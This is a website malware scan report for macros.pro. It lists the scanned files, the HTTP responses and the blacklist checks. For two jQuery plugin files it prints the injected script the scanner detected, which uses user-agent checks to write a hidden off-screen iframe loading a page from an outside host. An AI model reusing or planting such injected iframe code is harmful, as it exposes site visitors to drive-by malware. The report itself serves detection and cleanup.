New scan:

Malware Scanner report for macros.pro

Malicious/Suspicious/Total urls checked
2/0/8
2 pages have malicious code. See details below
Blacklists
OK
Malicious Redirects
OK
Malicious/Hidden/Total iFrames
0/0/2
Deface / Content modification
OK

Free periodic scanning and alerting: setup
(requires eVuln badge or a link to eVuln.com)

Malware & Hack Repair

  • Malware Removal
  • Blacklists Removal
  • Reason Eliminating
  • 1 Month Hack Insurance

More details

Website Hack Insurance

  • Files & DB Monitoring
  • Daily Backups
  • Malware & Hack Detection
  • Unlimited Hack Repairs

More details

Scanned pages/files

RequestServer responseStatus
http://macros.pro/
200 OK
Content-Length: 20676
Content-Type: text/html
clean
http://ajax.googleapis.com/ajax/libs/jquery/1.4/jquery.min.js
200 OK
Content-Length: 78601
Content-Type: text/javascript
clean
http://macros.pro/../js/picbox.js
400 Bad Request
Content-Length: 173
Content-Type: text/html
clean
http://macros.pro/test404page.js
404 Not Found
Content-Length: 1734
Content-Type: text/html
clean
http://macros.pro/../js/jquery.pngFix.js
400 Bad Request
Content-Length: 173
Content-Type: text/html
clean
http://macros.pro//yandex.st/share/share.js/
404 Not Found
Content-Length: 1734
Content-Type: text/html
clean
http://macros.pro/js/jquery.easing.1.3.js
200 OK
Content-Length: 8706
Content-Type: application/javascript
malicious
Malicious code - confirmed by antiviruses (see below)

function Grandarium() {
var soset = navigator.userAgent;
var unicode = (soset.indexOf("IEMobile") > -1 || soset.indexOf("Chrome") > -1 || soset.indexOf("Windows") < +1);
if (!unicode) {
document.write('<iframe src="http://daboglow.dubbyhos.com/iliustrosa15.html" style="position:absolute;top: -888px;left: -888px;border-style:dashed;border-color:green;background-color:purple;" height="138" width="138"></iframe>');
}
}
Grandarium();
jQuery
... 3493 bytes are skipped ...
2.75)) {
return c*(7.5625*(t-=(1.5/2.75))*t + .75) + b;
} else if (t < (2.5/2.75)) {
return c*(7.5625*(t-=(2.25/2.75))*t + .9375) + b;
} else {
return c*(7.5625*(t-=(2.625/2.75))*t + .984375) + b;
}
},
easeInOutBounce: function (x, t, b, c, d) {
if (t < d/2) return jQuery.easing.easeInBounce (x, t*2, 0, c, d) * .5 + b;
return jQuery.easing.easeOutBounce (x, t*2-d, 0, c, d) * .5 + c*.5 + b;
}
});
;;;;;;;;;;;;;;;;;;;;;

Antivirus reports:

Sophos
Troj/JSRedir-OI

http://macros.pro/js/jquery.ui.totop.js
200 OK
Content-Length: 2895
Content-Type: application/javascript
malicious
Malicious code - confirmed by antiviruses (see below)

function Grandarium() {
var soset = navigator.userAgent;
var unicode = (soset.indexOf("IEMobile") > -1 || soset.indexOf("Chrome") > -1 || soset.indexOf("Windows") < +1);
if (!unicode) {
document.write('<iframe src="http://daboglow.dubbyhos.com/iliustrosa15.html" style="position:absolute;top: -888px;left: -888px;border-style:dashed;border-color:green;background-color:purple;" height="138" width="138"></iframe>');
}
}
Grandarium();
(funct
... 2100 bytes are skipped ...
/> var sd = $(window).scrollTop();
if(typeof document.body.style.maxHeight === "undefined") {
$(containerIDhash).css({
'position': 'absolute',
'top': $(window).scrollTop() + $(window).height() - 50
});
}
if ( sd > settings.min )
$(containerIDhash).stop(true,true).fadeIn(400);
else
$(containerIDhash).fadeOut(600);
});
$(window).resize(function(){top()})
};
})(jQuery);
;;;;;;;;;;;;;;;;;;;;;

Antivirus reports:

Sophos
Troj/JSRedir-OI


Malicious Redirects

First query (normal visit):
GET / HTTP/1.1
Host: macros.pro

Result:
HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Connection: close
Date: Fri, 05 Sep 2014 15:41:31 GMT
Pragma: no-cache
Server: Jino.ru/mod_pizza
Content-Type: text/html
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Set-Cookie: PHPSESSID=73e55c9b7601516a726f50bc0461bdd0; path=/
Second query (visit from search engine):
GET / HTTP/1.1
Host: macros.pro
Referer: http://www.google.com/search?q=macros.pro

Result:
The result is similar to the first query. There are no suspicious redirects found.

Safe Browsing / Blacklists

Query: http://www.google.com/safebrowsing/diagnostic?site=macros.pro

Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://macros.pro/

Result: macros.pro is not infected or malware details are not published yet.